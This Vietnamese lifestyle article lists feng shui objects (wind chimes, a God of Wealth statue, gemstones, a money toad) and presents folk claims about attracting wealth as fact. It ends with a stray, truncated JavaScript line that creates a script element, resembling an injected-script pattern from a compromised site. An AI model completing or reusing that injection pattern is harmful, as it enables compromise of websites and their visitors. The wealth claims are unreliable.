Những biểu tượng phong thủy giúp có nhiều tài lộc

Việc bài trí nhà ở hợp phong thủy sẽ giúp gia chủ gặp nhiều may mắn và khỏe mạnh. Cùng điểm qua những biểu tượng phong thủy trong trang trí nhà ở giúp mang lại tài lộc cho người sử dụng.

Chuông gió mang tới sự tốt lành

chuong-gio-phong-thuy

Treo chuông gió phong thủy mang tới sự tốt lành

Chuông gió là một trong các biểu tượng phong thủy vô cùng tốt như: đàn áp năng lượng ở các góc xấu chiếu xuống, giúp người sử dụng gặp nhiều điều có lợi trong cuộc sống, chuông gió mang lại vận may, sức khỏe, tài lộc và hòa hợp giữa các thành viên trong gia đình. Chuông gió được dùng để hút tiền bạc vào trong nhà. Kinh nghiệm dùng hiệu quả nhất so với chuông gió là số 9, có thể là 9cm, hoặc 9 sợi dây ruy băng đỏ.

Ông thần tài

Quan niệm dân gian của người xưa cho rằng, ông thần tài quản lý tiền bạc của thiên hạ. Khi nhận được sự giúp đỡ của ông nhất định sẽ thăng tiến quan chức, tiền tài. Do đó có nhiều gia đình bố trí ông Thần Tài trong nhà để hy vọng sự giàu sang, phú quý. Ông thần tài được sử dụng để cầu phước lành cho gia chủ, vị trí tốt nhất để đặt Thần Tài đó là đối diện đối với cửa trước.

Đá quý và đá phong thủy

bieu-tuong-da-phong-thuy

Đá phong thủy là biểu tượng sự giàu sang và phú quý

Đá quý và đá phong thủy là biểu tượng của giàu sang, phú quý. Bạn nên giữ kim cương hoặc đồ trang sức bằng đá quý vào một chiếc hộp có màu tím hay màu vàng trong góc tiền tài của phòng ngủ. Trong phong thủy, điều này có nghĩa là sự sang trọng, giàu có sẽ tới gia đình bạn. Trong các loại đá quý thì đá thạch anh tím có màu sắc đẹp, vừa trang trí, vừa là biểu tượng của phú quý. Nếu tình hình tài chính gia đình bạn không mấy ổn định thì hãy bài trí các vật nặng như đá tròn hoặc tượng ở góc tiền tài sẽ giúp mọi người cải thiện tài chính của gia đình.

Cóc phong thủy

Trong phong thủy, cóc ngậm tiền hay còn gọi là Thiềm Thừ là một biểu tượng phong thủy được dùng để cầu tài lộc. Sau ngay khi khai quang, cóc ngậm tiền nhìn thấy ai đầu tiên thì sẽ mãi mãi phù hộ cho người đó. Ếch ngậm tiền có lợi nhất là bài trí cóc hướng vào phía trong căn nhà, hướng vào bàn thờ ông địa, và nghiêng một góc 45 độ để thần tài tượng trưng cho việc cóc mang tài lộc vào trong nhà.

var d=document;var s=d.createElement(‘script’);